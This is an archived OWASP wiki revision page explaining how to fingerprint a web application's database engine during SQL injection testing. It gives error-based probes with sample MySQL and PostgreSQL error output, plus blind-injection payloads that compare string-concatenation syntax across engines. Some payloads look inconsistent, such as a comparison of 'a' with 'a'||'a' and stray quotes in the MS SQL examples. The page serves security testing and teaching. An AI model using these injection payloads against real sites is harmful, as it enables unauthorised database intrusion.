This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "OWASP Backend Security Project DBMS Fingerprint"
(New page: = Fingerprint remote DBMS = To furthermore exploit SQL Injection vulnerability you need to know what kind of Database Engine your web application is using. There are a few techniques to ...) |
|||
| Line 13: | Line 13: | ||
Let'see some examples: | Let'see some examples: | ||
| − | http://www.example.com/store/findproduct.php?name=' | + | <nowiki>http://www.example.com/store/findproduct.php?name=' |
| + | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version | ||
| + | for the right syntax to use near ''''' at line 1 | ||
| + | </nowiki> | ||
| − | + | <nowiki>http://www.example.com/store/products.php?id=' | |
| − | |||
| − | http://www.example.com/store/products.php?id=' | ||
Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM products WHERE ID=' ^ in /var/www/store/products.php on line 9 | Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM products WHERE ID=' ^ in /var/www/store/products.php on line 9 | ||
| + | </nowiki> | ||
== Engine Fingerprint == | == Engine Fingerprint == | ||
| Line 26: | Line 28: | ||
is on how they concatenate strings: | is on how they concatenate strings: | ||
| − | MS SQL: '' + '' | + | '''MS SQL''': 'a' + 'a' |
| − | MySQL: CONCAT('','') | + | |
| − | Oracle: '' || '' | + | '''MySQL''': CONCAT('a','a') |
| − | Postgres: '' || '' | + | |
| + | '''Oracle''': 'a' || 'a' ''or'' CONCAT('a','a') | ||
| + | |||
| + | '''Postgres''': 'a' || 'a' | ||
| + | |||
As you can see both Oracle and Postgres use the || operator to perform | As you can see both Oracle and Postgres use the || operator to perform | ||
| Line 37: | Line 43: | ||
and as you can guess this one is not defined on Postgres. | and as you can guess this one is not defined on Postgres. | ||
| − | |||
| − | Let say you're testing the following URL: | + | '''Example:''' |
| − | http://www.example.com/news.php?id=1 | + | |
| + | Let say you're testing the following URL: <nowiki>http://www.example.com/news.php?id=1</nowiki> | ||
You checked that the above URL is vulnerable to a Blind SQL Injection. | You checked that the above URL is vulnerable to a Blind SQL Injection. | ||
| − | It means that http://www.example.com/news.php return back | + | It means that <nowiki>http://www.example.com/news.php</nowiki> return back |
the same contents with both | the same contents with both | ||
| − | id=1 (http://www.example.com/news.php?id=1) | + | |
| − | and | + | id=1 (<nowiki>http://www.example.com/news.php?id=1</nowiki>) |
| + | |||
| + | ''and'' | ||
| + | |||
id=1 AND 1=1 (http://www.example.com/news.php?id=1 AND 1=1) | id=1 AND 1=1 (http://www.example.com/news.php?id=1 AND 1=1) | ||
| + | |||
| + | |||
You know that different engine have different operators | You know that different engine have different operators | ||
| Line 53: | Line 64: | ||
to compare the orginal page (id=1) with: | to compare the orginal page (id=1) with: | ||
| − | * id=1 AND 'aa'='a'+'a' | + | * '''MSSQL:''' id=1 AND 'aa'='a'+'a' |
| − | * id=1 AND 'aa'=CONCAT('a','a') | + | * '''MySQL/Oracle:''' id=1 AND 'aa'=CONCAT('a','a') |
| − | * id=1 AND 'a'='a'||'a' | + | * '''Oracle/Postgres:''' id=1 AND 'a'='a'||'a' |
| + | |||
| + | |||
| + | '''MS SQL''': | ||
| − | |||
The following comparison should be true: | The following comparison should be true: | ||
| − | * http://www.example.com/news.php?id=1 | + | * <nowiki>http://www.example.com/news.php?id=1''</nowiki> |
| − | * http://www.example.com/news.php?id=1 AND 'aa'='a'+'a' | + | * <nowiki>http://www.example.com/news.php?id=1 AND 'aa'='a'+'a'''</nowiki> |
| + | |||
| + | '''MySQL''': | ||
| − | |||
The following comparison should be true: | The following comparison should be true: | ||
| − | * http://www.example.com/news.php?id=1 | + | * <nowiki>http://www.example.com/news.php?id=1</nowiki> |
| − | * http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a') | + | * <nowiki>http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')</nowiki> |
| + | |||
| + | '''Oracle''': | ||
| − | |||
The following comparison should be true: | The following comparison should be true: | ||
| − | * http://www.example.com/news.php?id=1 | + | * <nowiki>http://www.example.com/news.php?id=1</nowiki> |
| − | * http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a') | + | * <nowiki>http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')</nowiki> |
| − | * http://www.example.com/news.php?id=1 AND 'aa'='a'||'a' | + | * <nowiki>http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'</nowiki> |
| + | |||
| + | '''Postgres''': | ||
| − | |||
The following comparison should be true: | The following comparison should be true: | ||
| − | * http://www.example.com/news.php?id=1 | + | * <nowiki>http://www.example.com/news.php?id=1</nowiki> |
| − | * http://www.example.com/news.php?id=1 AND 'aa'='a'||'a' | + | * <nowiki>http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'</nowiki> |
| + | |||
== References == | == References == | ||
Victor Chapela: "Advanced SQL Injection" | Victor Chapela: "Advanced SQL Injection" | ||
| + | |||
http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt | http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt | ||
== Tools == | == Tools == | ||
| + | |||
Bernardo Damele and Daniele Bellucci: sqlmap a blind SQL injection tool | Bernardo Damele and Daniele Bellucci: sqlmap a blind SQL injection tool | ||
| + | |||
| + | http://sqlmap.sourceforge.net/ | ||
Revision as of 01:45, 11 May 2008
Fingerprint remote DBMS
To furthermore exploit SQL Injection vulnerability you need to know what kind of Database Engine your web application is using. There are a few techniques to accomplish this task:
* Error Code Analysis * Engine Fingerprint
Error Codes Analysis
By performing fault injection, or fuzzing, you can gather important information through error code analysis. Let'see some examples:
http://www.example.com/store/findproduct.php?name=' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
http://www.example.com/store/products.php?id=' Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM products WHERE ID=' ^ in /var/www/store/products.php on line 9
Engine Fingerprint
First of all let see what differences exists between DBMS. One of the biggest difference between different database engine is on how they concatenate strings:
MS SQL: 'a' + 'a'
MySQL: CONCAT('a','a')
Oracle: 'a' || 'a' or CONCAT('a','a')
Postgres: 'a' || 'a'
As you can see both Oracle and Postgres use the || operator to perform
such a concatenation, so we need another difference to distinguish them.
PL/SQL define the CONCAT operator as well to perform string concatenation and as you can guess this one is not defined on Postgres.
Example:
Let say you're testing the following URL: http://www.example.com/news.php?id=1
You checked that the above URL is vulnerable to a Blind SQL Injection. It means that http://www.example.com/news.php return back the same contents with both
id=1 (http://www.example.com/news.php?id=1)
and
id=1 AND 1=1 (http://www.example.com/news.php?id=1 AND 1=1)
You know that different engine have different operators to perform string concatenation as well so all you have to do is to compare the orginal page (id=1) with:
- MSSQL: id=1 AND 'aa'='a'+'a'
- MySQL/Oracle: id=1 AND 'aa'=CONCAT('a','a')
- Oracle/Postgres: id=1 AND 'a'='a'||'a'
MS SQL:
The following comparison should be true:
- http://www.example.com/news.php?id=1''
- http://www.example.com/news.php?id=1 AND 'aa'='a'+'a'''
MySQL:
The following comparison should be true:
- http://www.example.com/news.php?id=1
- http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')
Oracle:
The following comparison should be true:
- http://www.example.com/news.php?id=1
- http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')
- http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'
Postgres:
The following comparison should be true:
- http://www.example.com/news.php?id=1
- http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'
References
Victor Chapela: "Advanced SQL Injection"
http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
Tools
Bernardo Damele and Daniele Bellucci: sqlmap a blind SQL injection tool
